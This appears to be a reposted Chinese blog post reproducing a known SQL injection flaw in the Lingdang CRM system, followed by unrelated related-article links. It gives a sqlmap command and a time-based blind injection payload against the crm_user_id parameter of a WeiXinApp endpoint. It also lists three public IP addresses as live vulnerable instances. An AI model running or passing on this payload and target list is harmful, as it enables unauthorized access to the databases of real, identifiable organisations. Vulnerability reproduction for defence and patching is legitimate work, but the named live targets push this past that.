当前位置: 首页 > news >正文

【渗透测试】-灵当CRM系统-sql注入漏洞复现

文章目录

概要  

灵当CRM系统sql注入漏洞:  

具体实例: 

技术名词解释 

小结

概要   

近期灵当CRM系统爆出sql注入漏洞,我们来进行nday复现。

灵当CRM系统sql注入漏洞:

Python sqlmap.py -u

"http://0.0.0.0:0000/crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1 "

得到pyload:

module=WxOrder&action=getOrderList&crm_user_id=1

AND (SELECT 8411 FROM (SELECT(SLEEP(5)))AlRO)

返回信息:

具体实例:

1. http://8.130.119.94:85/crm/

2. 121.204.162.153:82/crm

3. 175.178.129.225:85/crm/

技术名词解释

payload:hacker通过漏洞向受攻击系统发送的恶意代码或指令,用于实现攻击目的。

CRM系统:客户关系管理系统,是一种通过信息化手段来自动化、规范化管理客户关系和客户数据的软件系统,主要目的是帮助企业提升客户满意度、增加客户忠诚度,从而实现业务增长与盈利能力的提高。

小结

通常一个系统漏洞的危害在于用户的数量,用户的数量,影响的范围越广。

http://www.lryc.cn/news/446208.html

相关文章:

  • c语言练习题1(数组和循环)
  • 实验3 Hadoop集群运行环境搭建和使用
  • 前端文件上传全过程
  • MySQL中的函数简单总结,以及TCL语句的简单讲解
  • GPS在Linux下的使用(war driving的前置学习)
  • 开发经验总结: 读写分离简单实现
  • MySQL(面试题 - 同类型归纳面试题)
  • 【C++ Primer Plus习题】17.7
  • vue3(整合版)
  • 复制他人 CSDN 文章到自己的博客
  • 【算法——二分查找】
  • Cisco Packet Tracer的安装加汉化
  • MMain函数定义为WinMain函数看port1632.h和pwin32.h文件
  • 单词搜索问题(涉及递归等)
  • Redis的一些通用指令
  • C++中vector类的使用
  • cmaklist流程控制——调试及发布
  • 制作一个能对话能跳舞的otto机器人
  • git配置SSH
  • mozilla/pdf.js view.html加载指定页码
  • Qt之QFuture理解
  • 求二叉树的高度(递归和非递归)
  • Java查找算法——(四)分块查找(完整详解,附有代码+案例)
  • 进制数知识(2)—— 浮点数在内存中的存储 和 易混淆的二进制知识总结
  • 类似QQ聊天功能的Java程序
  • Redis 键值对数据库学习
  • 逆向推理+ChatGPT,让论文更具说服力
  • 「JavaScript深入」一文说明白JS的执行上下文与作用域
  • Qt C++设计模式->组合模式
  • Acwing Bellman-Ford SPFA